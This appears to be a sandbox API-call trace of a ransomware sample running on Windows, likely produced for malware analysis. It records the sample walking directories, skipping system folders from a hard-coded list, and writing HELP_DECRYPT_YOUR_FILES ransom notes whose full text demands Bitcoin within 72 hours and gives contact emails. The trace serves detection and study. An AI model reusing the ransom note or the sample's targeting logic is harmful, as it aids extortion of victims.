	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{c5dc3753-b6c8-4057-b396-bf13d769311c}", cAlternateFileName="{C5DC3~1")) returned 1
	[0171.393] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{ee4aac98-c174-4941-82b1-d121e493e4fb}", cAlternateFileName="{EE4AA~1")) returned 1
	[0171.393] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", cAlternateFileName="{F1189~1")) returned 1
	[0171.393] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 1
	[0171.393] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 0
	[0171.393] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0171.395] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0171.396] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0171.396] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*"
	[0171.396] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.396] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.397] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0171.397] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.402] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.402] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.405] CloseHandle (hObject=0x384) returned 1
	[0171.405] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.406] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0171.407] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.408] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.408] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.408] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.408] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0171.408] CloseHandle (hObject=0x384) returned 1
	[0171.409] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.409] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.409] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.409] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0171.410] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.410] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.410] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0171.413] CloseHandle (hObject=0x384) returned 1
	[0171.414] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.414] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.414] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.415] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0171.421] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.421] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0171.422] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.422] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.422] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0171.422] CloseHandle (hObject=0x384) returned 1
	[0171.423] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7fb261f7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0171.423] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*") returned 45
	[0171.423] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.423] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\*.*") returned 0x2d
	[0171.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="windows") returned 0x0
	[0171.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="boot") returned 0x0
	[0171.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="system volume information") returned 0x0
	[0171.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="temp") returned 0x0
	[0171.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="program files") returned 0x0
	[0171.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.426] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="appdata") returned 0x0
	[0171.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.426] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="application data") returned 0x0
	[0171.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.426] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="winnt") returned 0x0
	[0171.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.427] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="tmp") returned 0x0
	[0171.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.427] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="cache") returned 0x0
	[0171.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.427] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.427] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="webcache") returned 0x0
	[0171.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.428] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="inetcache") returned 0x0
	[0171.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.428] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="nvidia") returned 0x0
	[0171.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.428] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="packages") returned 0x0
	[0171.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.428] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="cookies") returned 0x0
	[0171.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.429] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="programdata") returned 0x0
	[0171.429] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.429] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.429] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7fb261f7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.429] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.429] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11be8600, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11be8600, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11be8600, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6815, dwReserved0=0x0, dwReserved1=0x0, cFileName="countrytable.xml", cAlternateFileName="")) returned 1
	[0171.429] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fb261f7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fb261f7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fb4c59d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.430] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fb0018c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fb0018c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fb261f7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.430] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", cAlternateFileName="{18DCF~1")) returned 1
	[0171.430] lstrcmpW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="..") returned 1
	[0171.430] lstrcmpW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2=".") returned 1
	[0171.430] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0171.430] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0171.430] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}"
	[0171.430] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}"
	[0171.430] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\"
	[0171.431] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\"
	[0171.431] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*"
	[0171.431] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.439] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned 84
	[0171.439] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.439] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned 0x54
	[0171.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="windows") returned 0x0
	[0171.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="boot") returned 0x0
	[0171.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="system volume information") returned 0x0
	[0171.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="temp") returned 0x0
	[0171.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="program files") returned 0x0
	[0171.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="appdata") returned 0x0
	[0171.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="application data") returned 0x0
	[0171.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="winnt") returned 0x0
	[0171.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
